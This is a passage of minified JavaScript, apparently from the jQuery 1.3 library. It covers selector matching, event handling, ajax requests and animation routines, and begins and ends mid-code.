V=W[1],T=I.attrHandle[V]?I.attrHandle[V](Y):Y[V]!=null?Y[V]:Y.getAttribute(V),Z=T+"",X=W[2],U=W[4];return T==null?X==="!=":X==="="?Z===U:X==="*="?Z.indexOf(U)>=0:X==="~="?(" "+Z+" ").indexOf(U)>=0:!U?Z&&T!==false:X==="!="?Z!=U:X==="^="?Z.indexOf(U)===0:X==="$="?Z.substr(Z.length-U.length)===U:X==="|="?Z===U||Z.substr(0,U.length+1)===U+"-":false},POS:function(X,U,V,Y){var T=U[2],W=I.setFilters[T];if(W){return W(X,V,U,Y)}}}};var M=I.match.POS;for(var O in I.match){I.match[O]=RegExp(I.match[O].source+/(?![^\[]*\])(?![^\(]*\))/.source)}var E=function(U,T){U=Array.prototype.slice.call(U);if(T){T.push.apply(T,U);return T}return U};try{Array.prototype.slice.call(document.documentElement.childNodes)}catch(N){E=function(X,W){var U=W||[];if(H.call(X)==="[object Array]"){Array.prototype.push.apply(U,X)}else{if(typeof X.length==="number"){for(var V=0,T=X.length;V<T;V++){U.push(X[V])}}else{for(var V=0;X[V];V++){U.push(X[V])}}}return U}}var G;if(document.documentElement.compareDocumentPosition){G=function(U,T){var V=U.compareDocumentPosition(T)&4?-1:U===T?0:1;if(V===0){hasDuplicate=true}return V}}else{if("sourceIndex" in document.documentElement){G=function(U,T){var V=U.sourceIndex-T.sourceIndex;if(V===0){hasDuplicate=true}return V}}else{if(document.createRange){G=function(W,U){var V=W.ownerDocument.createRange(),T=U.ownerDocument.createRange();V.selectNode(W);V.collapse(true);T.selectNode(U);T.collapse(true);var X=V.compareBoundaryPoints(Range.START_TO_END,T);if(X===0){hasDuplicate=true}return X}}}}(function(){var U=document.createElement("form"),V="script"+(new Date).getTime();U.innerHTML="<input name='"+V+"'/>";var T=document.documentElement;T.insertBefore(U,T.firstChild);if(!!document.getElementById(V)){I.find.ID=function(X,Y,Z){if(typeof Y.getElementById!=="undefined"&&!Z){var W=Y.getElementById(X[1]);return W?W.id===X[1]||typeof W.getAttributeNode!=="undefined"&&W.getAttributeNode("id").nodeValue===X[1]?[W]:g:[]}};I.filter.ID=function(Y,W){var X=typeof Y.getAttributeNode!=="undefined"&&Y.getAttributeNode("id");return Y.nodeType===1&&X&&X.nodeValue===W}}T.removeChild(U)})();(function(){var T=document.createElement("div");T.appendChild(document.createComment(""));if(T.getElementsByTagName("*").length>0){I.find.TAG=function(U,Y){var X=Y.getElementsByTagName(U[1]);if(U[1]==="*"){var W=[];for(var V=0;X[V];V++){if(X[V].nodeType===1){W.push(X[V])}}X=W}return X}}T.innerHTML="<a href='#'></a>";if(T.firstChild&&typeof T.firstChild.getAttribute!=="undefined"&&T.firstChild.getAttribute("href")!=="#"){I.attrHandle.href=function(U){return U.getAttribute("href",2)}}})();if(document.querySelectorAll){(function(){var T=F,U=document.createElement("div");U.innerHTML="<p class='TEST'></p>";if(U.querySelectorAll&&U.querySelectorAll(".TEST").length===0){return}F=function(Y,X,V,W){X=X||document;if(!W&&X.nodeType===9&&!Q(X)){try{return E(X.querySelectorAll(Y),V)}catch(Z){}}return T(Y,X,V,W)};F.find=T.find;F.filter=T.filter;F.selectors=T.selectors;F.matches=T.matches})()}if(document.getElementsByClassName&&document.documentElement.getElementsByClassName){(function(){var T=document.createElement("div");T.innerHTML="<div class='test e'></div><div class='test'></div>";if(T.getElementsByClassName("e").length===0){return}T.lastChild.className="e";if(T.getElementsByClassName("e").length===1){return}I.order.splice(1,0,"CLASS");I.find.CLASS=function(U,V,W){if(typeof V.getElementsByClassName!=="undefined"&&!W){return V.getElementsByClassName(U[1])}}})()}function P(U,Z,Y,ad,aa,ac){var ab=U=="previousSibling"&&!ac;for(var W=0,V=ad.length;W<V;W++){var T=ad[W];if(T){if(ab&&T.nodeType===1){T.sizcache=Y;T.sizset=W}T=T[U];var X=false;while(T){if(T.sizcache===Y){X=ad[T.sizset];break}if(T.nodeType===1&&!ac){T.sizcache=Y;T.sizset=W}if(T.nodeName===Z){X=T;break}T=T[U]}ad[W]=X}}}function S(U,Z,Y,ad,aa,ac){var ab=U=="previousSibling"&&!ac;for(var W=0,V=ad.length;W<V;W++){var T=ad[W];if(T){if(ab&&T.nodeType===1){T.sizcache=Y;T.sizset=W}T=T[U];var X=false;while(T){if(T.sizcache===Y){X=ad[T.sizset];break}if(T.nodeType===1){if(!ac){T.sizcache=Y;T.sizset=W}if(typeof Z!=="string"){if(T===Z){X=true;break}}else{if(F.filter(Z,[T]).length>0){X=T;break}}}T=T[U]}ad[W]=X}}}var K=document.compareDocumentPosition?function(U,T){return U.compareDocumentPosition(T)&16}:function(U,T){return U!==T&&(U.contains?U.contains(T):true)};var Q=function(T){return T.nodeType===9&&T.documentElement.nodeName!=="HTML"||!!T.ownerDocument&&Q(T.ownerDocument)};var J=function(T,aa){var W=[],X="",Y,V=aa.nodeType?[aa]:aa;while((Y=I.match.PSEUDO.exec(T))){X+=Y[0];T=T.replace(I.match.PSEUDO,"")}T=I.relative[T]?T+"*":T;for(var Z=0,U=V.length;Z<U;Z++){F(T,V[Z],W)}return F.filter(X,W)};o.find=F;o.filter=F.filter;o.expr=F.selectors;o.expr[":"]=o.expr.filters;F.selectors.filters.hidden=function(T){return T.offsetWidth===0||T.offsetHeight===0};F.selectors.filters.visible=function(T){return T.offsetWidth>0||T.offsetHeight>0};F.selectors.filters.animated=function(T){return o.grep(o.timers,function(U){return T===U.elem}).length};o.multiFilter=function(V,T,U){if(U){V=":not("+V+")"}return F.matches(V,T)};o.dir=function(V,U){var T=[],W=V[U];while(W&&W!=document){if(W.nodeType==1){T.push(W)}W=W[U]}return T};o.nth=function(X,T,V,W){T=T||1;var U=0;for(;X;X=X[V]){if(X.nodeType==1&&++U==T){break}}return X};o.sibling=function(V,U){var T=[];for(;V;V=V.nextSibling){if(V.nodeType==1&&V!=U){T.push(V)}}return T};return;l.Sizzle=F})();o.event={add:function(I,F,H,K){if(I.nodeType==3||I.nodeType==8){return}if(I.setInterval&&I!=l){I=l}if(!H.guid){H.guid=this.guid++}if(K!==g){var G=H;H=this.proxy(G);H.data=K}var E=o.data(I,"events")||o.data(I,"events",{}),J=o.data(I,"handle")||o.data(I,"handle",function(){return typeof o!=="undefined"&&!o.event.triggered?o.event.handle.apply(arguments.callee.elem,arguments):g});J.elem=I;o.each(F.split(/\s+/),function(M,N){var O=N.split(".");N=O.shift();H.type=O.slice().sort().join(".");var L=E[N];if(o.event.specialAll[N]){o.event.specialAll[N].setup.call(I,K,O)}if(!L){L=E[N]={};if(!o.event.special[N]||o.event.special[N].setup.call(I,K,O)===false){if(I.addEventListener){I.addEventListener(N,J,false)}else{if(I.attachEvent){I.attachEvent("on"+N,J)}}}}L[H.guid]=H;o.event.global[N]=true});I=null},guid:1,global:{},remove:function(K,H,J){if(K.nodeType==3||K.nodeType==8){return}var G=o.data(K,"events"),F,E;if(G){if(H===g||(typeof H==="string"&&H.charAt(0)==".")){for(var I in G){this.remove(K,I+(H||""))}}else{if(H.type){J=H.handler;H=H.type}o.each(H.split(/\s+/),function(M,O){var Q=O.split(".");O=Q.shift();var N=RegExp("(^|\\.)"+Q.slice().sort().join(".*\\.")+"(\\.|$)");if(G[O]){if(J){delete G[O][J.guid]}else{for(var P in G[O]){if(N.test(G[O][P].type)){delete G[O][P]}}}if(o.event.specialAll[O]){o.event.specialAll[O].teardown.call(K,Q)}for(F in G[O]){break}if(!F){if(!o.event.special[O]||o.event.special[O].teardown.call(K,Q)===false){if(K.removeEventListener){K.removeEventListener(O,o.data(K,"handle"),false)}else{if(K.detachEvent){K.detachEvent("on"+O,o.data(K,"handle"))}}}F=null;delete G[O]}}})}for(F in G){break}if(!F){var L=o.data(K,"handle");if(L){L.elem=null}o.removeData(K,"events");o.removeData(K,"handle")}}},trigger:function(I,K,H,E){var G=I.type||I;if(!E){I=typeof I==="object"?I[h]?I:o.extend(o.Event(G),I):o.Event(G);if(G.indexOf("!")>=0){I.type=G=G.slice(0,-1);I.exclusive=true}if(!H){I.stopPropagation();if(this.global[G]){o.each(o.cache,function(){if(this.events&&this.events[G]){o.event.trigger(I,K,this.handle.elem)}})}}if(!H||H.nodeType==3||H.nodeType==8){return g}I.result=g;I.target=H;K=o.makeArray(K);K.unshift(I)}I.currentTarget=H;var J=o.data(H,"handle");if(J){J.apply(H,K)}if((!H[G]||(o.nodeName(H,"a")&&G=="click"))&&H["on"+G]&&H["on"+G].apply(H,K)===false){I.result=false}if(!E&&H[G]&&!I.isDefaultPrevented()&&!(o.nodeName(H,"a")&&G=="click")){this.triggered=true;try{H[G]()}catch(L){}}this.triggered=false;if(!I.isPropagationStopped()){var F=H.parentNode||H.ownerDocument;if(F){o.event.trigger(I,K,F,true)}}},handle:function(K){var J,E;K=arguments[0]=o.event.fix(K||l.event);K.currentTarget=this;var L=K.type.split(".");K.type=L.shift();J=!L.length&&!K.exclusive;var I=RegExp("(^|\\.)"+L.slice().sort().join(".*\\.")+"(\\.|$)");E=(o.data(this,"events")||{})[K.type];for(var G in E){var H=E[G];if(J||I.test(H.type)){K.handler=H;K.data=H.data;var F=H.apply(this,arguments);if(F!==g){K.result=F;if(F===false){K.preventDefault();K.stopPropagation()}}if(K.isImmediatePropagationStopped()){break}}}},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(H){if(H[h]){return H}var F=H;H=o.Event(F);for(var G=this.props.length,J;G;){J=this.props[--G];H[J]=F[J]}if(!H.target){H.target=H.srcElement||document}if(H.target.nodeType==3){H.target=H.target.parentNode}if(!H.relatedTarget&&H.fromElement){H.relatedTarget=H.fromElement==H.target?H.toElement:H.fromElement}if(H.pageX==null&&H.clientX!=null){var I=document.documentElement,E=document.body;H.pageX=H.clientX+(I&&I.scrollLeft||E&&E.scrollLeft||0)-(I.clientLeft||0);H.pageY=H.clientY+(I&&I.scrollTop||E&&E.scrollTop||0)-(I.clientTop||0)}if(!H.which&&((H.charCode||H.charCode===0)?H.charCode:H.keyCode)){H.which=H.charCode||H.keyCode}if(!H.metaKey&&H.ctrlKey){H.metaKey=H.ctrlKey}if(!H.which&&H.button){H.which=(H.button&1?1:(H.button&2?3:(H.button&4?2:0)))}return H},proxy:function(F,E){E=E||function(){return F.apply(this,arguments)};E.guid=F.guid=F.guid||E.guid||this.guid++;return E},special:{ready:{setup:B,teardown:function(){}}},specialAll:{live:{setup:function(E,F){o.event.add(this,F[0],c)},teardown:function(G){if(G.length){var E=0,F=RegExp("(^|\\.)"+G[0]+"(\\.|$)");o.each((o.data(this,"events").live||{}),function(){if(F.test(this.type)){E++}});if(E<1){o.event.remove(this,G[0],c)}}}}}};o.Event=function(E){if(!this.preventDefault){return new o.Event(E)}if(E&&E.type){this.originalEvent=E;this.type=E.type}else{this.type=E}this.timeStamp=e();this[h]=true};function k(){return false}function u(){return true}o.Event.prototype={preventDefault:function(){this.isDefaultPrevented=u;var E=this.originalEvent;if(!E){return}if(E.preventDefault){E.preventDefault()}E.returnValue=false},stopPropagation:function(){this.isPropagationStopped=u;var E=this.originalEvent;if(!E){return}if(E.stopPropagation){E.stopPropagation()}E.cancelBubble=true},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=u;this.stopPropagation()},isDefaultPrevented:k,isPropagationStopped:k,isImmediatePropagationStopped:k};var a=function(F){var E=F.relatedTarget;while(E&&E!=this){try{E=E.parentNode}catch(G){E=this}}if(E!=this){F.type=F.data;o.event.handle.apply(this,arguments)}};o.each({mouseover:"mouseenter",mouseout:"mouseleave"},function(F,E){o.event.special[E]={setup:function(){o.event.add(this,F,a,E)},teardown:function(){o.event.remove(this,F,a)}}});o.fn.extend({bind:function(F,G,E){return F=="unload"?this.one(F,G,E):this.each(function(){o.event.add(this,F,E||G,E&&G)})},one:function(G,H,F){var E=o.event.proxy(F||H,function(I){o(this).unbind(I,E);return(F||H).apply(this,arguments)});return this.each(function(){o.event.add(this,G,E,F&&H)})},unbind:function(F,E){return this.each(function(){o.event.remove(this,F,E)})},trigger:function(E,F){return this.each(function(){o.event.trigger(E,F,this)})},triggerHandler:function(E,G){if(this[0]){var F=o.Event(E);F.preventDefault();F.stopPropagation();o.event.trigger(F,G,this[0]);return F.result}},toggle:function(G){var E=arguments,F=1;while(F<E.length){o.event.proxy(G,E[F++])}return this.click(o.event.proxy(G,function(H){this.lastToggle=(this.lastToggle||0)%F;H.preventDefault();return E[this.lastToggle++].apply(this,arguments)||false}))},hover:function(E,F){return this.mouseenter(E).mouseleave(F)},ready:function(E){B();if(o.isReady){E.call(document,o)}else{o.readyList.push(E)}return this},live:function(G,F){var E=o.event.proxy(F);E.guid+=this.selector+G;o(document).bind(i(G,this.selector),this.selector,E);return this},die:function(F,E){o(document).unbind(i(F,this.selector),E?{guid:E.guid+this.selector+F}:null);return this}});function c(H){var E=RegExp("(^|\\.)"+H.type+"(\\.|$)"),G=true,F=[];o.each(o.data(this,"events").live||[],function(I,J){if(E.test(J.type)){var K=o(H.target).closest(J.data)[0];if(K){F.push({elem:K,fn:J})}}});F.sort(function(J,I){return o.data(J.elem,"closest")-o.data(I.elem,"closest")});o.each(F,function(){if(this.fn.call(this.elem,H,this.fn.data)===false){return(G=false)}});return G}function i(F,E){return["live",F,E.replace(/\./g,"`").replace(/ /g,"|")].join(".")}o.extend({isReady:false,readyList:[],ready:function(){if(!o.isReady){o.isReady=true;if(o.readyList){o.each(o.readyList,function(){this.call(document,o)});o.readyList=null}o(document).triggerHandler("ready")}}});var x=false;function B(){if(x){return}x=true;if(document.addEventListener){document.addEventListener("DOMContentLoaded",function(){document.removeEventListener("DOMContentLoaded",arguments.callee,false);o.ready()},false)}else{if(document.attachEvent){document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){document.detachEvent("onreadystatechange",arguments.callee);o.ready()}});if(document.documentElement.doScroll&&l==l.top){(function(){if(o.isReady){return}try{document.documentElement.doScroll("left")}catch(E){setTimeout(arguments.callee,0);return}o.ready()})()}}}o.event.add(l,"load",o.ready)}o.each(("blur,focus,load,resize,scroll,unload,click,dblclick,mousedown,mouseup,mousemove,mouseover,mouseout,mouseenter,mouseleave,change,select,submit,keydown,keypress,keyup,error").split(","),function(F,E){o.fn[E]=function(G){return G?this.bind(E,G):this.trigger(E)}});o(l).bind("unload",function(){for(var E in o.cache){if(E!=1&&o.cache[E].handle){o.event.remove(o.cache[E].handle.elem)}}});(function(){o.support={};var F=document.documentElement,G=document.createElement("script"),K=document.createElement("div"),J="script"+(new Date).getTime();K.style.display="none";K.innerHTML=' <link/><table></table><a href="/a" style="color:red;float:left;opacity:.5;">a</a><select><option>text</option></select><object><param/></object>';var H=K.getElementsByTagName("*"),E=K.getElementsByTagName("a")[0];if(!H||!H.length||!E){return}o.support={leadingWhitespace:K.firstChild.nodeType==3,tbody:!K.getElementsByTagName("tbody").length,objectAll:!!K.getElementsByTagName("object")[0].getElementsByTagName("*").length,htmlSerialize:!!K.getElementsByTagName("link").length,style:/red/.test(E.getAttribute("style")),hrefNormalized:E.getAttribute("href")==="/a",opacity:E.style.opacity==="0.5",cssFloat:!!E.style.cssFloat,scriptEval:false,noCloneEvent:true,boxModel:null};G.type="text/javascript";try{G.appendChild(document.createTextNode("window."+J+"=1;"))}catch(I){}F.insertBefore(G,F.firstChild);if(l[J]){o.support.scriptEval=true;delete l[J]}F.removeChild(G);if(K.attachEvent&&K.fireEvent){K.attachEvent("onclick",function(){o.support.noCloneEvent=false;K.detachEvent("onclick",arguments.callee)});K.cloneNode(true).fireEvent("onclick")}o(function(){var L=document.createElement("div");L.style.width=L.style.paddingLeft="1px";document.body.appendChild(L);o.boxModel=o.support.boxModel=L.offsetWidth===2;document.body.removeChild(L).style.display="none"})})();var w=o.support.cssFloat?"cssFloat":"styleFloat";o.props={"for":"htmlFor","class":"className","float":w,cssFloat:w,styleFloat:w,readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",tabindex:"tabIndex"};o.fn.extend({_load:o.fn.load,load:function(G,J,K){if(typeof G!=="string"){return this._load(G)}var I=G.indexOf(" ");if(I>=0){var E=G.slice(I,G.length);G=G.slice(0,I)}var H="GET";if(J){if(o.isFunction(J)){K=J;J=null}else{if(typeof J==="object"){J=o.param(J);H="POST"}}}var F=this;o.ajax({url:G,type:H,dataType:"html",data:J,complete:function(M,L){if(L=="success"||L=="notmodified"){F.html(E?o("<div/>").append(M.responseText.replace(/<script(.|\s)*?\/script>/g,"")).find(E):M.responseText)}if(K){F.each(K,[M.responseText,L,M])}}});return this},serialize:function(){return o.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?o.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password|search/i.test(this.type))}).map(function(E,F){var G=o(this).val();return G==null?null:o.isArray(G)?o.map(G,function(I,H){return{name:F.name,value:I}}):{name:F.name,value:G}}).get()}});o.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","),function(E,F){o.fn[F]=function(G){return this.bind(F,G)}});var r=e();o.extend({get:function(E,G,H,F){if(o.isFunction(G)){H=G;G=null}return o.ajax({type:"GET",url:E,data:G,success:H,dataType:F})},getScript:function(E,F){return o.get(E,null,F,"script")},getJSON:function(E,F,G){return o.get(E,F,G,"json")},post:function(E,G,H,F){if(o.isFunction(G)){H=G;G={}}return o.ajax({type:"POST",url:E,data:G,success:H,dataType:F})},ajaxSetup:function(E){o.extend(o.ajaxSettings,E)},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:function(){return l.ActiveXObject?new ActiveXObject("Microsoft.XMLHTTP"):new XMLHttpRequest()},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},ajax:function(M){M=o.extend(true,M,o.extend(true,{},o.ajaxSettings,M));var W,F=/=\?(&|$)/g,R,V,G=M.type.toUpperCase();if(M.data&&M.processData&&typeof M.data!=="string"){M.data=o.param(M.data)}if(M.dataType=="jsonp"){if(G=="GET"){if(!M.url.match(F)){M.url+=(M.url.match(/\?/)?"&":"?")+(M.jsonp||"callback")+"=?"}}else{if(!M.data||!M.data.match(F)){M.data=(M.data?M.data+"&":"")+(M.jsonp||"callback")+"=?"}}M.dataType="json"}if(M.dataType=="json"&&(M.data&&M.data.match(F)||M.url.match(F))){W="jsonp"+r++;if(M.data){M.data=(M.data+"").replace(F,"="+W+"$1")}M.url=M.url.replace(F,"="+W+"$1");M.dataType="script";l[W]=function(X){V=X;I();L();l[W]=g;try{delete l[W]}catch(Y){}if(H){H.removeChild(T)}}}if(M.dataType=="script"&&M.cache==null){M.cache=false}if(M.cache===false&&G=="GET"){var E=e();var U=M.url.replace(/(\?|&)_=.*?(&|$)/,"$1_="+E+"$2");M.url=U+((U==M.url)?(M.url.match(/\?/)?"&":"?")+"_="+E:"")}if(M.data&&G=="GET"){M.url+=(M.url.match(/\?/)?"&":"?")+M.data;M.data=null}if(M.global&&!o.active++){o.event.trigger("ajaxStart")}var Q=/^(\w+:)?\/\/([^\/?#]+)/.exec(M.url);if(M.dataType=="script"&&G=="GET"&&Q&&(Q[1]&&Q[1]!=location.protocol||Q[2]!=location.host)){var H=document.getElementsByTagName("head")[0];var T=document.createElement("script");T.src=M.url;if(M.scriptCharset){T.charset=M.scriptCharset}if(!W){var O=false;T.onload=T.onreadystatechange=function(){if(!O&&(!this.readyState||this.readyState=="loaded"||this.readyState=="complete")){O=true;I();L();T.onload=T.onreadystatechange=null;H.removeChild(T)}}}H.appendChild(T);return g}var K=false;var J=M.xhr();if(M.username){J.open(G,M.url,M.async,M.username,M.password)}else{J.open(G,M.url,M.async)}try{if(M.data){J.setRequestHeader("Content-Type",M.contentType)}if(M.ifModified){J.setRequestHeader("If-Modified-Since",o.lastModified[M.url]||"Thu, 01 Jan 1970 00:00:00 GMT")}J.setRequestHeader("X-Requested-With","XMLHttpRequest");J.setRequestHeader("Accept",M.dataType&&M.accepts[M.dataType]?M.accepts[M.dataType]+", */*":M.accepts._default)}catch(S){}if(M.beforeSend&&M.beforeSend(J,M)===false){if(M.global&&!--o.active){o.event.trigger("ajaxStop")}J.abort();return false}if(M.global){o.event.trigger("ajaxSend",[J,M])}var N=function(X){if(J.readyState==0){if(P){clearInterval(P);P=null;if(M.global&&!--o.active){o.event.trigger("ajaxStop")}}}else{if(!K&&J&&(J.readyState==4||X=="timeout")){K=true;if(P){clearInterval(P);P=null}R=X=="timeout"?"timeout":!o.httpSuccess(J)?"error":M.ifModified&&o.httpNotModified(J,M.url)?"notmodified":"success";if(R=="success"){try{V=o.httpData(J,M.dataType,M)}catch(Z){R="parsererror"}}if(R=="success"){var Y;try{Y=J.getResponseHeader("Last-Modified")}catch(Z){}if(M.ifModified&&Y){o.lastModified[M.url]=Y}if(!W){I()}}else{o.handleError(M,J,R)}L();if(X){J.abort()}if(M.async){J=null}}}};if(M.async){var P=setInterval(N,13);if(M.timeout>0){setTimeout(function(){if(J&&!K){N("timeout")}},M.timeout)}}try{J.send(M.data)}catch(S){o.handleError(M,J,null,S)}if(!M.async){N()}function I(){if(M.success){M.success(V,R)}if(M.global){o.event.trigger("ajaxSuccess",[J,M])}}function L(){if(M.complete){M.complete(J,R)}if(M.global){o.event.trigger("ajaxComplete",[J,M])}if(M.global&&!--o.active){o.event.trigger("ajaxStop")}}return J},handleError:function(F,H,E,G){if(F.error){F.error(H,E,G)}if(F.global){o.event.trigger("ajaxError",[H,F,G])}},active:0,httpSuccess:function(F){try{return !F.status&&location.protocol=="file:"||(F.status>=200&&F.status<300)||F.status==304||F.status==1223}catch(E){}return false},httpNotModified:function(G,E){try{var H=G.getResponseHeader("Last-Modified");return G.status==304||H==o.lastModified[E]}catch(F){}return false},httpData:function(J,H,G){var F=J.getResponseHeader("content-type"),E=H=="xml"||!H&&F&&F.indexOf("xml")>=0,I=E?J.responseXML:J.responseText;if(E&&I.documentElement.tagName=="parsererror"){throw"parsererror"}if(G&&G.dataFilter){I=G.dataFilter(I,H)}if(typeof I==="string"){if(H=="script"){o.globalEval(I)}if(H=="json"){I=l["eval"]("("+I+")")}}return I},param:function(E){var G=[];function H(I,J){G[G.length]=encodeURIComponent(I)+"="+encodeURIComponent(J)}if(o.isArray(E)||E.jquery){o.each(E,function(){H(this.name,this.value)})}else{for(var F in E){if(o.isArray(E[F])){o.each(E[F],function(){H(F,this)})}else{H(F,o.isFunction(E[F])?E[F]():E[F])}}}return G.join("&").replace(/%20/g,"+")}});var m={},n,d=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];function t(F,E){var G={};o.each(d.concat.apply([],d.slice(0,E)),function(){G[this]=F});return G}o.fn.extend({show:function(J,L){if(J){return this.animate(t("show",3),J,L)}else{for(var H=0,F=this.length;H<F;H++){var E=o.data(this[H],"olddisplay");this[H].style.display=E||"";if(o.css(this[H],"display")==="none"){var G=this[H].tagName,K;if(m[G]){K=m[G]}else{var I=o("<"+G+" />").appendTo("body");K=I.css("display");if(K==="none"){K="block"}I.remove();m[G]=K}o.data(this[H],"olddisplay",K)}}for(var H=0,F=this.length;H<F;H++){this[H].style.display=o.data(this[H],"olddisplay")||""}return this}},hide:function(H,I){if(H){return this.animate(t("hide",3),H,I)}else{for(var G=0,F=this.length;G<F;G++){var E=o.data(this[G],"olddisplay");if(!E&&E!=="none"){o.data(this[G],"olddisplay",o.css(this[G],"display"))}}for(var G=0,F=this.length;G<F;G++){this[G].style.display="none"}return this}},_toggle:o.fn.toggle,toggle:function(G,F){var E=typeof G==="boolean";return o.isFunction(G)&&o.isFunction(F)?this._toggle.apply(this,arguments):G==null||E?this.each(function(){var H=E?G:o(this).is(":hidden");o(this)[H?"show":"hide"]()}):this.animate(t("toggle",3),G,F)},fadeTo:function(E,G,F){return this.animate({opacity:G},E,F)},animate:function(I,F,H,G){var E=o.speed(F,H,G);return this[E.queue===false?"each":"queue"](function(){var K=o.extend({},E),M,L=this.nodeType==1&&o(this).is(":hidden"),J=this;for(M in I){if(I[M]=="hide"&&L||I[M]=="show"&&!L){return K.complete.call(this)}if((M=="height"||M=="width")&&this.style){K.display=o.css(this,"display");K.overflow=this.style.overflow}}if(K.overflow!=null){this.style.overflow="hidden"}K.curAnim=o.extend({},I);o.each(I,function(O,S){var R=new o.fx(J,K,O);if(/toggle|show|hide/.test(S)){R[S=="toggle"?L?"show":"hide":S](I)}else{var Q=S.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),T=R.cur(true)||0;if(Q){var N=parseFloat(Q[2]),P=Q[3]||"px";if(P!="px"){J.style[O]=(N||1)+P;T=((N||1)/R.cur(true))*T;J.style[O]=T+P}if(Q[1]){N=((Q[1]=="-="?-1:1)*N)+T}R.custom(T,N,P)}else{R.custom(T,S,"")}}});return true})},stop:function(F,E){var G=o.timers;if(F){this.queue([])}this.each(function(){for(var H=G.length-1;H>=0;H--){if(G[H].elem==this){if(E){G[H](true)}G.splice(H,1)}}});if(!E){this.dequeue()}return this}});o.each({slideDown:t("show",1),slideUp:t("hide",1),slideToggle:t("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(E,F){o.fn[E]=function(G,H){return this.animate(F,G,H)}});o.extend({speed:function(G,H,F){var E=typeof G==="object"?G:{complete:F||!F&&H||o.isFunction(G)&&G,duration:G,easing:F&&H||H&&!o.isFunction(H)&&H};E.duration=o.fx.off?0:typeof E.duration==="number"?E.duration:o.fx.speeds[E.duration]||o.fx.speeds._default;E.old=E.complete;E.complete=function(){if(E.queue!==false){o(this).dequeue()}if(o.isFunction(E.old)){E.old.call(this)}};return E},easing:{linear:function(G,H,E,F){return E+F*G},swing:function(G,H,E,F){return((-Math.cos(G*Math.PI)/2)+0.5)*F+E}},timers:[],fx:function(F,E,G){this.options=E;this.elem=F;this.prop=G;if(!E.orig){E.orig={}}}});o.fx.prototype={update:function(){if(this.options.step){this.options.step.call(this.elem,this.now,this)}(o.fx.step[this.prop]||o.fx.step._default)(this);if((this.prop=="height"||this.prop=="width")&&this.elem.style){this.elem.style.display="block"}},cur:function(F){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null)){return this.elem[this.prop]}var E=parseFloat(o.css(this.elem,this.prop,F));return E&&E>-10000?E:parseFloat(o.curCSS(this.elem,this.prop))||0},custom:function(I,H,G){this.startTime=e();this.start=I;this.end=H;this.unit=G||this.unit||"px";this.now=this.start;this.pos=this.state=0;var E=this;function F(J){return E.step(J)}F.elem=this.elem;if(F()&&o.timers.push(F)&&!n){n=setInterval(function(){var K=o.timers;for(var J=0;J<K.length;J++){if(!K[J]()){K.splice(J--,1)}}if(!K.length){clearInterval(n);n=g}},13)}},show:function(){this.options.orig[this.prop]=o.attr(this.elem.style,this.prop);this.options.show=true;this.custom(this.prop=="width"||this.prop=="height"?1:0,this.cur());o(this.elem).show()},hide:function(){this.options.orig[this.prop]=o.attr(this.elem.style,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(H){var G=e();if(H||G>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;var E=true;for(var F in this.options.curAnim){if(this.options.curAnim[F]!==true){E=false}}if(E){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;this.elem.style.display=this.options.display;if(o.css(this.elem,"display")=="none"){this.elem.style.display="block"}}if(this.options.hide){o(this.elem).hide()}if(this.options.hide||this.options.show){for(var I in this.options.curAnim){o.attr(this.elem.style,I,this.options.orig[I])}}this.options.complete.call(this.elem)}return false}else{var J=G-this.startTime;this.state=J/this.options.duration;this.pos=o.easing[this.options.easing||(o.easing.swing?"swing":"linear")](this.state,J,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update()}return true}};o.extend(o.fx,{speeds:{slow:600,fast:200,_default:400},step:{opacity:function(E){o.attr(E.elem.style,"opacity",E.now)},_default:function(E){if(E.elem.style&&E.elem.style[E.prop]!=null){E.elem.style[E.prop]=E.now+E.unit}else{E.elem[E.prop]=E.now}}}});if(document.documentElement.getBoundingClientRect){o.fn.offset=function(){if(!this[0]){return{top:0,left:0}}if(this[0]===this[0].ownerDocument.body){return o.offset.bodyOffset(this[0])}var G=this[0].getBoundingClientRect(),J=this[0].ownerDocument,F=J.body,E=J.documentElement,L=E.clientTop||F.clientTop||0,K=E.clientLeft||F.clientLeft||0,I=G.top+(self.pageYOffset||o.boxModel&&E.scrollTop||F.scrollTop)-L,H=G.left+(self.pageXOffset||o.boxModel&&E.scrollLeft||F.scrollLeft)-K;return{top:I,left:H}}}else{o.fn.offset=function(){if(!this[0]){return{top:0,left:0}}if(this[0]===this[0].ownerDocument.body){return o.offset.bodyOffset(this[0])}o.offset.initialized||o.offset.initialize();var 